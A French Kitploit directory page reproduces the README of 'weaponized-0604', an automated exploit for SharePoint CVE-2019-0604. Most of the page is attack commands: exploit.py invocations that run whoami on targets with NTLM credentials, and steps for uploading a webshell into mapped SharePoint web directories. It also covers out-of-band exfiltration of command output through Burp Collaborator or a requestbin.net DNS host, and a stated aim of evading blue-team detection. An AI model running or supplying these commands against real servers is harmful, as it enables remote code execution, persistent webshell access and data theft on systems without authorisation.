Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
weaponized-0604 — Outil automatisé pour exploiter la CVE-2019-0604 de SharePoint. | Kitploit
Outils/GitHubGitHub/gh0st0ne/weaponized-0604
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubgh0st0ne/weaponized-0604

weaponized-0604

Outil automatisé pour exploiter la CVE-2019-0604 de SharePoint.

Voir le dépôt
8il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2019-0604 armé

Outil d'exploitation automatisé pour maximiser CVE-2019-0604.

Prérequis

Le fichier requirements.txt doit lister toutes les bibliothèques Python utilisées par cet outil, et elles seront installées avec

root@kitploit:~
$ pip install -r requirements.txt

Exploitation aveugle manuelle (avec/sans identifiants)

root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -c whoami --ntlm -U <uname>:<passwd>

Fonction d'upload

téléversez tout ce qui est cool (webshell, outil de reconnaissance ...)

root@kitploit:~
Upload cmd.aspx to rcmd.aspx
--file-from /path/to/cmd.aspx --file-to /path/to/web_dir/rcmd.aspx

Mappage des répertoires

root@kitploit:~
Sharepoint Default Web Virtual Dir:
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_app_bin\ -> <target>/_app_bin/
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_vti_pvt\ -> <target>/_vti_pvt/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\layouts\ -> <target>/_layouts/15/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\controltemplates\ -> <target>/_controltemplates/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\login\ -> <target>/_login/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\windows\ -> <target>/_windows/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\wpresources\ -> <target>/_wpresources/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\isapi\ -> <target>/_vti_bin/

Utiliser OOB pour obtenir le résultat de la commande

Avec l'extension Burp collaborator_http_api

  1. Installez collaborator_http_api.py dans BurpSuite (Pro) ?

  2. Assurez-vous que BurpSuite est en cours d'exécution sur la même machine que cet exploit.

  3. Lancez, profitez de la sortie récupérée :)

root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -c whoami --collab --ntlm -U <uname>:<passwd>

sharepoint-rce-oob-demo

Avec DNSLog tel que requestbin.net

root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -r <path/to/reqFile> --oob 8486990041a11aaa43ce.d.requestbin.net -c "whoami /priv"

Récupérer les données du DNS

root@kitploit:~
2050524956494c4547455320494e464f524d4154494f4e
...

À vous de décoder :)

root@kitploit:~
 PRIVILEGES INFORMATION
...

TODO

  • Analyseur d'arguments
  • SharePoint, CVE-2019-0604
  • scinder cmd en plusieurs parties (dans args.cmds)
  • spécifier le binaire à la demande, pour éviter la détection par l'équipe bleue. (cmd.exe codé en dur actuellement)

Auteur

  • Tree
Télécharger l’outil